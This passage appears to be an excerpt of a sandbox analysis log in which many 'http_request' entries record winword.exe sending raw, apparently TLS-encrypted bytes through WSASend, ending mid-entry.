332.  
333.  
334. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x97\\xd2\\x0cqq\\x1c\\x88x\\xf8k\\x9d\\xc0\\xec\\xf7\\xa6u\\x9d\\xbc\\x7f\\xd1\\xcco\\xee\\x8f\\x10\\xdb\\x11l\\x1e\\x95\\xf3\\x93d< \\xc9e\\x0c\\x10 \\xb3a\\x98\\xd5\\xeb\\xf6\\x15icx\\x8c\\x8b\\xe5\\x8c\\xaeo\\xa5h\\xd1\\x1ea\\x9d\\x17f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x81\\x9e7\\xe8e\\xd5\\xa3\\x06\\xbe\\xa6\\x16*j-f1sm\\xc9\\x97q42\\xdd\\xbf\\x02\\x1df\n\\xc5\\xb8\\x0f^-\\xb3\\x12\\xf0k\\x02\\x9f\\xf1\\x92v\\x00(\\x82\\x02"
335.  
336.  
337. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xdcu\\xc1\\xd0\r\\xee\\xb9e\\xaa\\xed\\xf3\\x9a\\x17e\\xbd\\xbcb\\x17\\xfa\\xe6\n\\x88@'\\x9eh\\xfa~\\xb2\\xc2\\xb7\\x18\\xb1\\xdem\\xd5y1\\xfac$!\\xaen\\xa0\\xe8\\xd3\\xc3\"2\\xa2\\xa4h\\xbbr\\xb2\\x04\\xc6\\x07\\xed\\xb0m\\x7f'\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x85\\xb1(\\xdc\\\\x1a\\x81\\xaa\\xae\\xe5i\\xd9s\\xa8\\xe2ln$\\xff\\xd8\\xd0q\\x8c\\xc6\\x84^\\xf3\\x8d\\xb3y\rriq\\xa1;xl\\xb4\\xb8~\\xea\\x9f\\xf6 \\xfaz\\x9a"
338.  
339.  
340. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc84&\\xc2\\xc2\\xd9b\\xb3\\xe6\\xd4\\xda\\xb4\\x91ye\\xbf\\x9f\\x05^g\\xc9\\xdeb\\xe7d\\xbc\\xbd\\x0c/\\xbbr\\xc7\\xa8\\xc9cfd\\xd9\\xb9\\x87_\\xf1\\x91%\\xfcz\\xf9\\x9cp\\x8f\\x96\\x8ad\\xef\\xf1\\x9e\\xae\\x9d\\xf4f3\\x95\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8e#\\xc3\\xd5\\xd3-d\\x9d\\xa2v\\xce\\xe2+\\xf8\\x93p\\xe5\\x9fc\n|\\xcec\\xd3\\x9a\\x05\\xb0\\xf6\\xeb\\xc8\\xa5\\xa4\\x8a\\xae\\xe7\\x9cv\\x97\\x8a>\\xd4x_\\xd0\\xc55)\\xf1"
341.  
342.  
343. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04x\\x1e\\xae\\xcd\\xa0%\\x88\\x99f\\xac\\x81\r\\xe3ci^q>6\\xf1\\x85\\x06\\x1e\\x8d\\xea\\x83\\x7f\\x9b\\xbfm\\xcep\\xff\\x12\\xe3p\\x1d\\xaf>w/\\xb3\\xf2\\xd4\\x18\\xbf\\xe2\\xc22-\\xe2\\x8c\\xa9\\xda\\x8e\\xf7a\\xe2^w\\x91\\x9di\\x88\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xca\\xde\\x82x\\x12\\x9d5\\x07\\xbb\\xe3:\\xc9\\xa1)\\x01\\x8f\\x86\\x93t7\\xcc\\x92\\xa08\\\\xd4z\\xc1w\\x05v\\x98/\\xac\\xa3\\x84\\xe1\\xefy\\xe4\\x92!\\xf3\\x1c\\xc2\\x87\\xda\\xc3"
344.  
345.  
346. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04xc\\x99\\xf2\\xeb,\\x02\\xf4\\x1d.2\\xb8\\x01y\\x1a\\xf9\\xf8\\xc2j\\x87\\xe0\\xeb\\xe7,\\xc3\\xdft*\\x95\\x04g\\xb7\\x05\\xc2d~\\x84@\\x15c\\xce1\\xb0y\\xd4\\x90\\xac\\x06\\xbc\\x8a\t\\xe6\\e\\x84\\xe3 \\x13\\x0eo\\x96k\\x94\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfe%d\\xea(\\xc6k\\xe1r\\x18\\xf4\\xbe\\xbe&\\xa9\\xbb\\x9c\\xe2\\xb6\\x0f\\xdb\\x96\\x1d\\x84\\xc5\\x00k\\xaew*\\xd7\\xf8\\xa9\\xb5lf\\x1ff1$b\\x00\\x86#\\xea\\xc5\\x1e\\x8a"
347.  
348.  
349. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\\x94\\x03\\xb3\\xb9g\\x1a\\xcd \\x18\\xbe\\xb1\\x80\\x1e\\xe4m\\xe8\\x94\\x8bd\\xfb2s|\\x0b\\x86\\x11s\\xffw\\xba\\xfe\\x10\\xd7qb\\xf0\\xe4\\x85t\\xab~)\\x14\n\\xe2\\xa1n\\x92z\\x82\\xdb?\\x03\\xb2\\x81a\\x87y\\xed\\x83\\xe8\\xb1\\xe5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe85z\\xdf\\xb2\\x12#\\xb1nre\\xa3\\x00h\\xb89\\x1f\\xf4\\xefo6\\xd0\\xfc\\x19\\x11\\x127\\xdc\\xca\\x9d:q\\x84grz0;bc\\xb8\\xcf\\x00\\xc1\\xcbf\\xb7"
350.  
351.  
352. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x99\\xee\\xcd\\xd1\\xa0\\x8b\\xe9\\xb9:q2p6\\xc9\\xf5(d\\x04\\x0f\\x9b\\xc4\\xe5<tp\\x9b\tx\\xf20\\xcf\\x03\\xdf\\x8bv\\xdco\\xd4\\xc7\\x00.:rku8l\\xf0l\\xe8<4\\x9c\\xd69g1`28\\x19\\xf7\\xd8\\xc0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000:n\\xd8\\x81\\xcf\\xd6+\\x1bf7\\x16\\x07\\x85r\\x8a#\\x12\\xea\\xa1bf\\xc9\\xf3\\xc9\\xda\\xd2\\x8fnu\\xf8g\\x05\\xa4\\xe2\\xe2g\\xda\\x8c$\\xf0\\x81\\xf2\\xf0j%m\\xb9\\x06"
353.  
354.  
355. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l\\xdd\\x0f\\x14\\xa6\\*w\\xae6g\\xd0\"\\x80\\xcb\\x9e\\xb4e\\xa1z\\xcb=\\xc3\\xe1\\x8f\\xd7\\x9b\\x86\\x88-w\\xb1\\xfc\\xc6\\xe7\\xa7\\x81\\x0e\\x14,\\xdf\\xb3\\xfd\\xf3\\x00\n\\x0b8\\x95\\xb4gaa\\x94\\x85\\xef\\x8b\\x8a\\x13\\xea'\\x19\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc8\\x99\\xee\\x9d\\x89\\xbb4\\x15\\x95\\x85\\xe6\\xb2\\x8aa\\xde\\x9f\\xf8d_\\xf4-g\\xb5\\xb9\\x90\\x14\\xdc\\xee\\xdf\r\\xf5.d\\x00\\x9d\\x92\\xdb\\x9c#x\\xbd.=&^\\xc6"
356.  
357.  
358. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04o\\xf7p\\xe4os\\xa6|~\\x830\\xf8\r\\x02\\xb5\\xb2&\\xb7\\xa5\\xaaq\\xb0r\\xed\\x16\\xcf\\xdfd\\xaa\\xba\\xae\\xe6\\xde\\xbeq-\\xde9f\\xe7\\xed\\xa6\\x0c\\xdcm\\xab\\x1a\\xc5l\\xcfk\\xde\\xe3\\xd9\\xb6\\x82\\x85b\\xe6\\xf9g\\xc1\\x9f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe8\\xb3\\x02\\x80\\xb5\\xad\\xee6\\xb3\\x10\\x9e\\x1d^\\x01\\xb5\\xa7\\xd1\\x00\\xa4q\\xc7\\xf9\\x0b2q,\\xf5xgc\\xdaq\\xd2\\xcfk\\x7f'\\x9dw\\xd7\\x13\\x91\\x00\\xbe\\xe0&\\x94z"
359.  
360.  
361. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010b\\x04\\x9c\\x85p\\xc8\\x830\\xaeb\\x1f\\xb7\\x17\\xef\\xf2_\\x00~w\\xe8b\\xc8\\xd7qz5\\xb7\\x06\\x1a\\xa7i\\xbbol\\x14\\xcc=|\\x90s\\xfb9|\\x9a\\x18hy\\xdf\\x9a%zc\\x1b\\xba\\x0c\\xe7>\n\\x16d\\xcf\\xa0?\\x1c\\xdb\t\\xaet;\\xad\\xbcfp\\xf0\\xc6\\xefh@\\xe0\\xda\\x03o9\\xd6\\xfd\\xfa\\xf8\\xe3\\xff\\xd2\r9\\xf4\\x11<`|\\x9b\\x1f\\xf2\\xcc\\xbe\\x934\\xb4\\x0c\\xae\\x17\\xe1/\r\\x82d\\x9a\\x1bb\\xe6obs\\xaa`\\xd0?\\x0c\\x183\\xe0\\xe7\\xb8\\x12\\xb8\\x88\\x83?w`\\x1f\\x10\\x9ew\"\\x8d\\x80\r\\xd1\\x02\\x9e\\xfbqt!z\\x8dh\\x93\\xa5(\\xdai\\xc8\\xc7\\x9c\\x13f\"\\xb6|\\x91<\\xe8\\xa5;\\xa6\\xcfcl\\xa3\\x8b\\xac\\xa9\\x16\\xba\\x14\\xa5\\x00j\\xd0d\\x97\r\\xc2t\\xa8r@\\x9eqj\\x98\\xee\\x1c\\x12;\\xe1cu\\x06\\xc4!\\x0e\\xeb\\xaf\\xa0u\\xd1zcgep\\x85\\x82\\xf3\r\\xfc\\xceq\\xeaid\\xfd\\xc8\\x88\\xe2\\xc6\\xcb\\x8f\\xb7:t\\xbe\\x10\\\\xaez"
362.  
363.  
364. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\xc71\\x00\\xc3kc\\xb6\\xfb\rso\\x93\\x93s6m\\x07\\xb3\\xd3\\xd4\\xaf\\xde/\\xc3o\\x8e\\xf6\\xd3^!'\\xe5\\xf3jp'\\xc8\\x0b\\x1bu\\xb8\\xfe\\xc1r/\\x1a\\xd5d\\xdfj->\tk\\x81\\xb2\\x87ta\\xfd\\xdf\\x1dh\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\n\\xdb\\\\xaf\\x93\\xe8\\x11\\xb3\\xc0\\x14\\xb15\\xfex\\xc0\\xab\\x9c\\x90\\xc5\\xbd\\xa3l.\\x1f\\xd3\\xed\\xf5\\xe2\\x10v\\xdc\\xeci\\xd6\\x98\\x16'0\nt\\xeel\\xe4a3\\xbf\\"
365.  
366.  
367. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04n\\x01o\\xcc\\xd7\n\\xa1\\xe2\\x00g\\x16\\x16(\\xf2\\xa1\t\\x95f\\xc5\"d\\xab\\xc2\\x13\\xcb.\\x1c\\xab\\xf6)u\\x15w\\xd5\\x92\\xd6\\xb6/\\x89\\xc1j\\xdd\\xd3\t\\x0b\\\\x0c$/\t\\xb6\\x8a\\x8c\\x98?o\\xe4\\xea\\\\xbded\\xdf\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x05\\x048yd\\x8e\\x84\\xee\\xc4\\xbd\\xb2$\\x9a\\x05g\\xcc\\xf1\\x997\\xd5*\\x871\\xbd\\x9a\\xa0v\\xc5\\xb1\\xd2\\xcez\\x95\\x1b@\\x10\\x84j\\xbe\\x86\\xd4\\x9d\\xfe\\x07\\xe6 \n"
368.  
369.  
370. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd0l~\\xd9\\xfe\\xc3\\xe1vc0km\\x9ft\\xb2j(\\xe1\\xd8\\xe7\\xc9\\xdc~c\\xe7\\x0eh\\xdd\\xfc\\xa1\\xad\\x95~\\xd3\\x10w\\x07\\xe5m\\x9eg_\\xc6i\\xa2*\\xc0\\x0b\\xf8.0\\xd0\\xa6\\xd7\\xe0\\x187\\x18\\xd7\\xc4e\\xb8\\xa1\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000p\\xd7\\xdc\",\\xab\\x030\\xfb\\x9bl\\xd1kn\\xd5\\xbc\t\\x1d\\x8bxx\\x8e\\xf5\\xe0\\x07q\\xd9\\x87q\\x8dmm\\x83\\xcd\\xded\\xcd2k~\\x90\\x80#\\x89\\xd5\\xccz"
371.  
372.  
373. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04k\\xae\\xa9\\x14\\xea\\xe1\\xd8.\\\\x1b\\x1eq\\x94\\xf4\\xe9\\xa12\\xacm.a\\xc4\\xdbl\\xb6>\\x12\\xb7\\xeb%0\\x07\\x06rz\\xd48a\\x94r\\xb9\\x80,d6z\\xef\\xc5li\\x9az\\x03\\x18\\\\xf3l\\x11\\xbexg\\xcc\\x86\\x82\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o\\xef\\xcdt\\x97zi\\x89+\\xed\\x885\\xbct\\x87\\xdf\\xe0g7\\xeft\n\\x9cvj\\xa1\\xf8\\xd1\\xf8\\xa78+\\xce\\x82\\x11p\\xa8\\xf7\\x1e\\x11\\xe5\\\\xfe(\\xec."
374.  
375.  
376. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xda\\x17^\\x9c\\x8a,tm\\x03*\\xabkg\\xaav\\xe0~\\x9d\\xbc\\x0c\\x05\\xa4\\x9e\\xd2(n\\xa0\\x17\\x9d\\x0cit2\\x13\\x86_\\xb1w\\x04\\xc8\\xdf\\x17\\xc0\\xe4\\x85\\xc3\\xdf\\x8fc\\xe0s\\x9a\\x04\\xdc\\x1d#\\xf7\\xbe\\x8c&\\x15\\x939\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x00\\xf9\\x1eo\\xf6 \\xbd\\xabm/\\x89m\\x15\\xe3i\\xcb\\x87\\x00\\xe1_@@\\xa6\\xbb \\x18\r'\\x7fo\\xbfu<a\\xf6\\xdd\\xcfby\\x1e\\xcdj^z\\x87"
377.  
378.  
379. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2w.\\x95\\x972\\xcc\\xce\\xf6\\xb4c\\xdbg\\x8bi\\xf8s\\xe4\\xf3\\x9a+\\xda\\x93l\\xe6n,\\xda\\x07\\xc9\\xbb\\x94\\xd9\\x1fo\\xc1w\\xe5\\xf9\\xa8\\xee4\\xab\\x0b\\x1c\\x86\\xe7\\xad\\?\\xe8\\xbf\"\\xf3$\\xbe\\xc7r\\xf1h5%h\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x12\\xd1 '@\\xfb\\xddz\\xd5$\\xb54\\xc6\\xe8\\x82\\xd8,\t\\x84_!\\xf91\\xa1\\xb8j\\x9da\\xc121w\\xccsy\n;\\xfc\\xe8\\xcd\\xdb&\r\\xdc\\xd6v\\xf0\\xf4"
380.  
381.  
382. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04t<\\x7f f\\x11\\xa6\"\\x84\\x86\\xc8d\\x04s\\xca\\x92\\x17%\\xad\\x0b\\x11\\xbd#\\xc4nl9\\x0b\\xa8\\xb7\\xf8\\xf7p?fr\\x9elm\\q\\xca\\xa6\\xce\r~\\x1b\\xe7yj7)as\\xd5\\xec)w\\xa6\\xb6-5\\x9d\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf0,\\x02\\x9c\\xc4\\xc5s\\xacf/4\\xf8\\xb9\\xf0\\xa9\\x7f\t\\x1d\\xe9a\\xb0\\xfev_;\\xfbz\\xd4\\xb6\\x9e\\x951\\xc3\\x91\\xda\\x0f\\x92d@\\xce\\x92j\\x16\\x84\n\\xac"
383.  
384.  
385. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x99x\t<\\xb8\\x17\t\\xc2i\\xc5\\xf1\\x1e\\xbe\\xbd,vn\\xc4kl0kf\\xaa\\x80e\\x7fj\\x87\\xbd\\x81py\\xac\\xa80uu\\xab\\xba;q\\xf9\\x18\\x91\\xb8\\x82_\\x0eph3\\xe1\\xaa\"\\xde\\xc0\n\\xb8 e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfb%\\x87\n\\x9ae\\x159\\xf6\\x93\\x03p\\x13\rb\\xec9\\xd6\\x021\\xabr\\xaee\\x8f\\x89\\xb6\\x90\\x97\\xddm\\xb1\\x1d\\x95\\xfb\\x9b\\x03\\xb2\\x12\\xab\\xd8d(\\xb26o-"
386.  
387.  
388. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc9\\xd4\\x14\\xf5dvp\\x1d\\xd0q\\xf2|>\\x8d\"\\x18\\x8a\\xa7(\\x1c(98i\\xa5\\xe9\\x16x%p\\x0f \\x8f21\n\\xb3.\\xf8nk\\x1b\\x12\\xba\\xf0\\xfd\\xd0\\xc1\\xb2\\xd9&+\\x0fm\\xc7\\xea\\x83_\\xf8\\xe4.\\xe9y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xae\\xf3\\x03f\\x178\\x85ne\\xb9\\x92\r!\\x96t\\xbf_y\\xfb\\xb39/l^\\x99\\x95\\x8a\\xb4\\xb7\\xde\\xae\\xc2=\\xc7i\\xe0\\x08\\xf1\\xdfn\\xc4fh\\xac\\xfaj\\xa5"
389.  
390.  
391. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010n\\xc7d\\x92&\\xaa\\xbc\\xc8\\xcf\\xe5^7\\x04\\x0fb\\xd3m\\x152h\\x1f\\x9e\\xd6\\x17c\\xb4w\\x8e\\xa2adg\\xe7\\xbe\\x05dn\\xa69\\x82\\xb0\\xc1w\\xb2\\x80\\x10\\x03\\xed%kh\\x99d\\x9e\\xf8\\xf3/\\xbeiy\\x8e\\x18\\xb2yw\r\\x13\\xea<\\x19\\xbdyu\\xe7\\xc6\\xb1\\xbde\\xf9#=\"\\xcb\\x9a\\x84=\\xd2\\xc2t\\xb6\\xd1\\xc1\\x14\\xc4m\\xf6~l\\xa3\\xd8\\xc8gx\\xd6\\xc3\\xdd\\xcd\\xc0jn\\x84w\\x1f#\\x03\\xacd\\x8c\\xd0a\\x8e\\xb4\\x11\\x91\\xd2\\xb0\\xc6\\x02\\xdc\\x88yut\\xbf\\xf8\\xe9\\xa4d-?k\\xe2c\\xfd\\x94h \\x9cs\\xd3\\x90\\xe89g\\xd9\\x99\\xb5\\x80p\\x87\\xb4`1\\xb5\\xaa\\xfa/\\xd3t\\xcfp\\xb0\\x9d\\xe2\\xa4m*\\xb9\\xb1>\\xd4\\xbc\\x8f\\x96\\x1az\\xe6\\xc1\\xdc\\x8f\\x82\\x9du\\xf4\\xcf\n\\xb7a\\x03\\xf0\\x1c\\x91\\x95f\\x98\\xee\\x8b\\x8e_&a\\x1f3$\\x8a;>\\xab\\xb5\\xce\\x17\\xb6\\x90\\xb5\\x12\\xcb\\x13\\x0b\\xb1c\\xe2\\xd7n\\xa6w\\x94\\x8ev\\xf4\\x92!\\xf0\\x7f\\xc2\\x98$h"
392.  
393.  
394. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9df\\xa8=1\\xae\\x9c\\xf5\\x14*\\xe6\\x05y\\xc1\\xb6\\xa3e\\xf9e\\xbc\\xd1\\x8e\\x11aa\\xf2\\x9f\\xc4\\x8dt\t/\\x94f\\x00\\x95 \\xf1\\xa7=\\x93\\x1a\\xa5\\x1a\\\\x16\\xa2`i+\\x00\\xc0\\x12`\\x84\\xe9\\xa8\\x91\\xb3\\x9a+\\xfc\\x86\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000f\\x06t\\xaf\\xc9\\xcb\\xfd*\\xb2q\\xea\\xa3$_\\xc9\\xab\\xa5\\xa5\\x9c\\xc5\\x0f\\x0c)?&\\xc9\\x8dmj\\xeb\\x0b\\x86u4\\xeb*\\xb9\\x9b\\xf0\\xedy\\x8c\\xfe>\\xd8\\x94\\xd4c"
395.  
396.  
397. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x7f.\\xd2\\xa2g\\x17\\xa5\\x0f\\xcd\\xa6\\xcbl\\x0b\\xdc\\xa3xo\\xd4\\xa5\\xf8x3\\x10>@\\x7f\\xa0ib\\xb1s\\xbd\\xb0\\x05\\xe8\\xb65zf\\xaed\\x8a\\x06\\x8c3\\x11\\x96\\x02\\xa6\\xa4\\x15\\xbf\\xd0\\xfa\\xefc\\\\x03\\xda\\x1es\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xd4\r\\xba\\x96\\xcdm\\x9f*\\xeeikjs\\x8b\\xeb6\\xcd\\x97\\xc1ka\\xc0\\x1a\\xa1\\xabj&oa\\x96\\xaem\\xfa\\xfem\\xf6\\xf2\\x1c\\x94\\x81\\x87\\xf7\\xa2\\x0br\\x04"
398.  
399.  
400. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04ecw('\\xc1\\x93had\nq\\xb8\\xf9a\\x15\\xa03\\xaf\\x1b\\xf0\\xd6\\xe2d\\xa4n\\x9e\\xa7=\\xcblo\\xddn8o\\x15\\xdb\\xd8\\xae1,\\x0b\\xe0\\xdb\\x98\\x83\\x03hi\\xe0\\x0f\\x82l\\x0c\\xc5\\x9f\\x90/\\x17\\xf0^i\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xefg\\xbf<\\xff\\x8d;\\x01\\xe5\\xea\\xde\\x9a\\x19\\xcd\\x16e\\xae\\x06zp\\xf1\\xdc\\x86\\xd7zg\\xb8d\\xad\\xac\\x0e\\xe2t\\xafo\\xe3\\xa5\\xe0\\xc8\\x10s\\xd5z\\xb0\\x814-\\x12"
401.  
402.  
403. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04=\\xc2\\xd0jo\\xc5's6\\x10z\\xa4n\\xb2\\x923\\x0b|b\\x95e\\xf8\\x92\"+\\x10\\xb4\\x9a\\xf3\\xc5#\\xdb\\x8aj\"\\x0c$\\x96g\\x05\\xac\\xdcs\\xbf\\x0b\\x99?co0\\xf8f\\xf7`\\xa3\\xf2i\\xaf\\xfa\\xeb\\x05'\\x04\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0001\\x92\\xfb\\xe5\\x8f\\x19\\xf2y\\x12\\xfd\\xb3\\x9a\\xf4\\x12w\\xc28g(\\xcf\\xbf\\xe1w\r\\x16 \\xbe\\x0f\\xf7/\\xa9\\xe2\\xd88\\xf5^\\x1b_\\x00\\xe9\\xfb$\n\\x99\\xeep"
404.  
405.  
406. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa3\\xe3jy?\\x10\\xda`\\x97\\xc5\\x03#sf\\xcb\\x04\n^gw\\xeb\\x92\\xee\\xbf\\xb8\\xac\\xd6\\xeb\rc\\x082\\xd9'm\\xed\\xf0\\xb3\\x9c\\xb4\\xf4\\xedqal\\x1b=\\xffeq\\xf3\\x19\\x06\\xee6\\xf9\\xfb\\xadzrx\\xda\\x95\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x0e\\xd4 \\x12\\xb2\\xfb(\\xca\\x01$\\x04\\xba\\xbc(\\x1d\\x86\\xdf\\x0e\\x80\\xcf\\xb0\\xf4\\x10\\x18w\\xe7\\x1d\\x9d\\xfa8\\xda\\x1fqg\tg\\x94\\xe2\\xe2\\x04+\\xc0\t\\xb9q\\xb4"
407.  
408.  
409. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb31\\xc1\\xac\\xf0!\\xa5@\\xe2\\x06\\xa7\\xd8\\xe9wh(*~\\xa611\\x83\\x19\\x13\\x8b\\xd6\rq\\x18jc2w_\\x12\\xf2\\x7fc\\x0b'\\x02b\"j\\x9c\\x18\\xbb\\xeb\\xc4\\x1aq\\x1e\\xdau\\xb6\\x15j\\x00\\xc7\t\\xf8b\\x96\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe4;u\\x94\\xdc\\xc6^\\x85\\x00b\\xc8\\xae\\xdf,\\xbb\\xafa\\x8d\\xf2\\x9co\\xddz\\xd8\\x1c$\\xf8a\\xe1\\x1d\\xab\\x08gr\\xaf\\x19\\xb9\\x83\\xdf_\\xe3v\\xd2\\x81\\xdd"
410.  
411.  
412. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8`\rf\\x0c\\xae&\\xde\\xf2'\\xda\\xcd\\xd3y\\xb0#\\xaad\\x83\\xbd\\x8a9\\x93+\\xa71\\xfa\\x13\\xaam/\\xc3\\xbb\\x0eq\\x80!4\\xa6\\xbeu\\x1b\\xc3\\xbe9\\xa3k\\xac\\xd87~1\\xc6\\x0fn\\x8f\\x04\\xd5\\xdb\\xed\\x10!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000+)\\xdfk\\x9d\\\\xbep\\x1d\\xb8\\x85m?o\\xc8/u21\\xdf\\xee\\xd3\\xe3\\xe9\\x0ce\\xb8\\x8d <jj\\xa5j\\xfb\\x12\\xd0\\xe5ki\\xc6v\\x96\\xb0\\xca\\x97\\x93y"
413.  
414.  
415. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010n\\xd4\\xe6@\\xa5\\xdf\\x83c\\xba\\x0b!f\\x7f\\x88\\xb9l\\xdcg\\xd9\\x99\\xd2\\x82\\xb3\\x14\\x8ewx\n<\\x00\\xb6\\xb9)q\\xb9\\\\x962\\x1cf\\xd6\\x9f\\xf6&\\x88d\\xbe\\xa6\\x13f:\\x14\\xc0\\xe0\\x9c\\x81\\xab\\x0eh\\xb1\\x06k7\\x1e<\\xe4\\x8f\\xfd\\x19\\x8c\\x1aa\\x84\\x97\\xe4?%\\x80\\xdew\\x9fb\\x8e\\xb5\\xfc\\xed\\x1a\\x91;\\xd7\\xb0d\\x18\\xaa~d\\xcf\\xf1\\xa3>\\xba\\x0b~\\xeb\\x19\\xa1\\x01q\\xc1\\xf8\\xe3\\x08\\x98\\x04\\xf6w!d\\xcb\\x1a\\x0e\\x1c\\xbf\\x8c\\xf2\\xacu\\\\xa9\\xc9\\x13\\xc7c\"\\x1a\\xd1z\\xca;\t\\xce\\xd8\\xd1\\xdf\\x80\\xfe\\xd8c\\xb7\\xef\\x1dv\\x92\\x82\\xf0(\\xd7pyz\\x1d\\x07n\\x1d\\x0c\\xcd\\xab\\xc3\\x8a\\xfao\\xc8\\xd8\\xd8\\xec\\xe6\\xb4\\xdf(\\xa9v\\xc0\\x9e\\xe9\\x00\\xda\\xa8,\\x08\\xa4\\xa7\r\\xd1\\xff\\x17\\b\\xafi\\x07\\xd8\\xde\\xa1\\xbb\\xfc\\x1f<\\x80\\x06k\\xba\\x90y\\x88\\x99'\\xe7\\xd6\\xa1\\xd5e4`r\\x8c#\\xfa\\xbe\\xe3d\\xa1\\x12\\xb9e\\x14\\x98x\\xf6\\x95j\\xca\\x16\";m~"
416.  
417.  
418. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb66\\x0e\\x19\\x01\\x18\\xb8\\x12\\xdd\\xect\\x8a0t\\xdd\\x88\\xb0!\\x1e\\x18\\xa0j\\xf2\\xc3|\\x9e\\xd7\\xe4\\\\xdd\\\\x1a:w\\xd7\\xc4\\x13\\x90\\xa3\\xa1b-k(\\xb7u\r1\\xf5w\\xf8\\x15$\\xaa\\x9b\\xf1\\xcc\\x86\\xbch\\xe4\\x147\\xa6\\xd7`\\xe0q\\x83\\x8c\\xa9\\xd3\\xea\\xa1\\x891\\xa9\\xbex4\\x9e\\x87\\x8a\"\\xd3\\x86\\xc9x\\x16ns\\xba 